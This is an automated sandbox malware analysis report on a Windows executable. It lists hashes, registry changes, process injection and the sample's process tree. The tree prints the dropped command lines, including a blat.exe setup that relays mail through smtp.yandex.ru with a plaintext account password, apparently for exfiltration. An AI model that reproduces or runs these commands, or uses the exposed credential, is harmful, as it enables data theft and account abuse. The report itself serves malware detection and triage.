Analysis
max time kernel: 149s
max time network: 150s
platform: windows10-2004_x64
resource: win10v2004-20241007-en
resource tags: arch:x64, arch:x86, image:win10v2004-20241007-en, locale:en-us, os:windows10-2004-x64, system
submitted: 16/10/2024, 22:51

Behavioral task: behavioral1
Sample: 4f73e81d0101de7157f5c2f005fb589d_JaffaCakes118.exe
Resource: win7-20240903-en
General
Target: 4f73e81d0101de7157f5c2f005fb589d_JaffaCakes118.exe
Size: 1.1MB
MD5: 4f73e81d0101de7157f5c2f005fb589d
SHA1: 0f361bde4d40acccf35047ecb549f9215ca14465
SHA256: e66f7f877023fed0b8fcf763b4c06744f087f32c378e59c143a51e932d176c3e
SHA512: 40383084fa3efc0603f187e9e67927b7949f29bb08504fc00dc5b77ea4998edb5da0c7f27fc848468a9459a940e2f0cca4d953e3c3515fddd06639766a95a663
SSDEEP: 24576:NnLB6UAKy5FQKBIxV5E+BHB5gaeuJN5qX35:NnN6UE5uO+nv4
Malware Config
Signatures

Checks computer location settings (2 TTPs, 1 IoC)
Looks up country code configured in the registry, likely geofence.
description | ioc | Process
Key value queried | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation | 4f73e81d0101de7157f5c2f005fb589d_JaffaCakes118.exe
Executes dropped EXE (2 IoCs)
pid | Process
3092 | blat.exe
3892 | MPR.exe

resource | yara_rule
behavioral2/memory/2696-0-0x0000000000400000-0x0000000000799000-memory.dmp | upx
behavioral2/memory/2696-24-0x0000000000400000-0x0000000000799000-memory.dmp | upx
Enumerates physical storage devices (1 TTPs)
Attempts to interact with connected storage/optical drive(s).
System Location Discovery: System Language Discovery (1 TTPs, 5 IoCs)
Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
description | ioc | Process
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | 4f73e81d0101de7157f5c2f005fb589d_JaffaCakes118.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | cmd.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | PING.EXE
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | blat.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | MPR.exe
System Network Configuration Discovery: Internet Connection Discovery (1 TTPs, 1 IoC)
Adversaries may check for Internet connectivity on compromised systems.
pid | Process
2112 | PING.EXE
Modifies registry class (21 IoCs)
description | ioc | Process
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\mprf | MPR.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\mprf\EditFlags = "0" | MPR.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\mprf\DefaultIcon | MPR.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\mprf\shell\open\command | MPR.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3F2BBC05-40DF-11D2-9455-00104BC936FF}\ = "Implements DocHostUIHandler" | MPR.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mpf\ = "mprf" | MPR.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3F2BBC05-40DF-11D2-9455-00104BC936FF}\LocalServer32 | MPR.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\MPR.DocHostUIHandler\ = "Implements DocHostUIHandler" | MPR.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\MPR.DocHostUIHandler\Clsid | MPR.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3F2BBC05-40DF-11D2-9455-00104BC936FF}\ProgID | MPR.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\mprf\shell\open | MPR.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\mprf\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\6E0C.tmp\\MPR.exe \"%1\"" | MPR.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\MPR.DocHostUIHandler | MPR.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\mprf\BrowserFlags = "8" | MPR.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\mprf\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\6E0C.tmp\\MPR.exe,0" | MPR.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\mprf\shell | MPR.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3F2BBC05-40DF-11D2-9455-00104BC936FF} | MPR.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3F2BBC05-40DF-11D2-9455-00104BC936FF}\LocalServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\6E0C.tmp\\MPR.exe" | MPR.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\MPR.DocHostUIHandler\Clsid\ = "{3F2BBC05-40DF-11D2-9455-00104BC936FF}" | MPR.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3F2BBC05-40DF-11D2-9455-00104BC936FF}\ProgID\ = "MPR.DocHostUIHandler" | MPR.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mpf | MPR.exe
Runs ping.exe (1 TTPs, 1 IoC)
pid | Process
2112 | PING.EXE

Suspicious behavior: LoadsDriver (1 IoC)
pid | Process
652 | Process not Found

Suspicious use of AdjustPrivilegeToken (1 IoC)
description | pid | Process
Token: SeDebugPrivilege | 3892 | MPR.exe

Suspicious use of SetWindowsHookEx (2 IoCs)
pid | Process
3892 | MPR.exe
3892 | MPR.exe

Suspicious use of WriteProcessMemory (12 IoCs)
description | pid | Process | procid_target
PID 2696 wrote to memory of 4104 | 2696 | 4f73e81d0101de7157f5c2f005fb589d_JaffaCakes118.exe | 85
PID 2696 wrote to memory of 4104 | 2696 | 4f73e81d0101de7157f5c2f005fb589d_JaffaCakes118.exe | 85
PID 2696 wrote to memory of 4104 | 2696 | 4f73e81d0101de7157f5c2f005fb589d_JaffaCakes118.exe | 85
PID 4104 wrote to memory of 2112 | 4104 | cmd.exe | 89
PID 4104 wrote to memory of 2112 | 4104 | cmd.exe | 89
PID 4104 wrote to memory of 2112 | 4104 | cmd.exe | 89
PID 4104 wrote to memory of 3092 | 4104 | cmd.exe | 97
PID 4104 wrote to memory of 3092 | 4104 | cmd.exe | 97
PID 4104 wrote to memory of 3092 | 4104 | cmd.exe | 97
PID 4104 wrote to memory of 3892 | 4104 | cmd.exe | 98
PID 4104 wrote to memory of 3892 | 4104 | cmd.exe | 98
PID 4104 wrote to memory of 3892 | 4104 | cmd.exe | 98
Processes

[1] C:\Users\Admin\AppData\Local\Temp\4f73e81d0101de7157f5c2f005fb589d_JaffaCakes118.exe
    Command line: "C:\Users\Admin\AppData\Local\Temp\4f73e81d0101de7157f5c2f005fb589d_JaffaCakes118.exe"
    PID: 2696
    - Checks computer location settings
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory

    [2] C:\Windows\SysWOW64\cmd.exe
        Command line: C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\6E0C.tmp\1.bat" "
        PID: 4104
        - System Location Discovery: System Language Discovery
        - Suspicious use of WriteProcessMemory

        [3] C:\Windows\SysWOW64\PING.EXE
            Command line: ping ya.ru -n 5
            PID: 2112
            - System Location Discovery: System Language Discovery
            - System Network Configuration Discovery: Internet Connection Discovery
            - Runs ping.exe

        [3] C:\Users\Admin\AppData\Local\Temp\6E0C.tmp\blat.exe
            Command line: blat.exe -install -server smtp.yandex.ru -port 587 -f [email protected] -u [email protected] -pw ttk2010
            PID: 3092
            - Executes dropped EXE
            - System Location Discovery: System Language Discovery

        [3] C:\Users\Admin\AppData\Local\Temp\6E0C.tmp\MPR.exe
            Command line: mpr.exe /export
            PID: 3892
            - Executes dropped EXE
            - System Location Discovery: System Language Discovery
            - Modifies registry class
            - Suspicious use of AdjustPrivilegeToken
            - Suspicious use of SetWindowsHookEx
Network
MITRE ATT&CK Enterprise v15
Downloads